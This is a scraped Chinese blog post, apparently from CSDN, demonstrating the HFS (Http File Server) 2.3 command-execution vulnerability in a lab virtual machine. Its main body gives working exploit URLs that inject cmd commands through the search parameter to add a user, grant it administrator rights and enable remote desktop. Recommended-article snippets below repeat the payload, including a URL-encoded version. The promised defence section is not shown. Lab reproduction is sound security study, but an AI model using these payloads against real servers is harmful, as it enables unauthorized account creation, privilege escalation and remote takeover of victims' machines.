HFS Cmd执行漏洞入侵与防御

最新推荐文章于 2024-07-04 22:03:43 发布
原创 最新推荐文章于 2024-07-04 22:03:43 发布 · 5.9k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何利用HFS(Http File Server)2.3.0.0版本的漏洞进行命令执行,包括添加用户、提升权限和开启远程桌面连接。同时,也提供了一种通过修改HFS属性来防御此类攻击的方法。

    最近爆出了HFS(Http File Server)爆出了这个漏洞。我测使用的是HFS 2.3.0.0  


我在搭建的虚拟机上运行了HFS。 把它当做是一台运行了 HFS的服务器。

现在我们查看一下 服务器(虚拟机有多少个账户) net user 指令能很好的查看


好我们利用漏洞 来增加账户!

在浏览器上键入这些地址和指令

http://192.168.1.9/?search==%00{.exec|cmd /c net user Smile Smile /add.} 这样我们就可以执行我们的CMD指令

在虚拟机上用net user查看。



这样账户就添加成功了。这样我们创建的是普通用户  的普通权限。接下来就是提权了

提升为管理员权限:

http://192.168.1.9/?search==%00{.exec|cmd /c net localgroup Administrators smile /add.}

开启3389:

http://192.168.1.9/?search==%00{.exec|cmd /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f.}

OK 

打开远程桌面连接  键入 192.168.1.9:3389

最低0.47元/天 解锁文章

200万优质内容无限畅学
针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
shatianyzg的博客
10-30 1129
利用Metasploit对HFS 2.3渗透攻击提权针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
Rejetto HFS 服务器存在严重漏洞受到攻击
最新发布
网络研究观
07-07 1922
黑客正在针对旧版本的 Rejetto HTTP 文件服务器 (HFS) 注入恶意软件和加密货币挖矿程序。
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 6090
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 2250
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
hfs 2.3m Build #300
12-28
在个人电脑上搭建http服务器,让其它朋友直接访问并下载,操作简单方便。
红泪HFS提权
06-03
HFS提权工具
漏洞利用-(HFS-RCE远程命令执行)
my的博客
07-04 2079
概念验证是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。
HFS的远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3511
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
HFS文件服务器RCE 漏洞复现(CVE-2024-23692
huangyongkang666的博客
06-11 6730
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
HFS2.3漏洞利用.rar
12-28
在当今数字化时代,互联网安全问题日益凸显,尤其是网络服务器软件的安全漏洞,已成为黑客攻击的...毕竟,在这场无休止的网络安全对抗中,提升防御能力和修复漏洞的速度,是每一个网络用户和管理者都应该承担的责任。
HFS修复漏洞
09-20
HFS修复漏洞
HFS命令行客户端_HFClient
04-18
最新版本:https://download.csdn.net/download/wang1u1u/15433177 因项目需要,搜罗全网没有找到合适的命令行下下载上传文件的客户端,所以自己手工编写了一个,下载大文件时会有进度条提醒,只经过简单测试 具体使用如下:最新版本请留言! 配合HFS使用效果更好 #下载 HFClient.exe get http://ip:port/test.rar D:\test.rar username:password #上传 HFClient.exe put D:\test.rar http://ip:port/ username:password
国外软件HFS 2.3x 远程命令执行漏洞 (本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件)本站教程教习如何梨园远程命令执行。。中国寒龙...
weixin_30537391的博客
09-07 734
这个程序在国内用的特别多,特别是那些抓肉鸡的黑阔。 1 2 http://localhost:80/?search==%00{.exec|cmd.} http://localhost:80/search=%00{.exec|cmd.} 注:有些版本search前面是没有?的。 测试部分:百度搜HFS默认就是2.3...
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 2474
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
HFS远程命令执行漏洞入侵抓鸡黑阔服务器
aiquan9342的博客
12-24 1609
先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便...
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6687
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
SSRF利用HFS的远程命令执行漏洞(RCE)
qq_45884775的博客
04-09 5379
0x00SSRF漏洞介绍: SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到它相连而外网隔离的内部系统)。 0x01SSRF漏洞原理: SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的we
安全开发-HFS漏洞利用脚本编写
niqiu320的博客
05-12 1204
0x01 安全开发-HFS漏洞利用脚本编写 下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta 一、攻击准备 复制HFS的IP在浏览器中,并且在IP后添加用户exp /?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D
HFS2.0漏洞提权实战教程揭秘
教程中可能会提供对HFS2.0软件的配置分析,指出哪些配置可能不安全,并提供相应的防御建议。同时,教程也可能包含对攻击者可能使用的技术的说明,例如缓冲区溢出、配置错误、服务滥用等,以及如何发现并利用这些漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值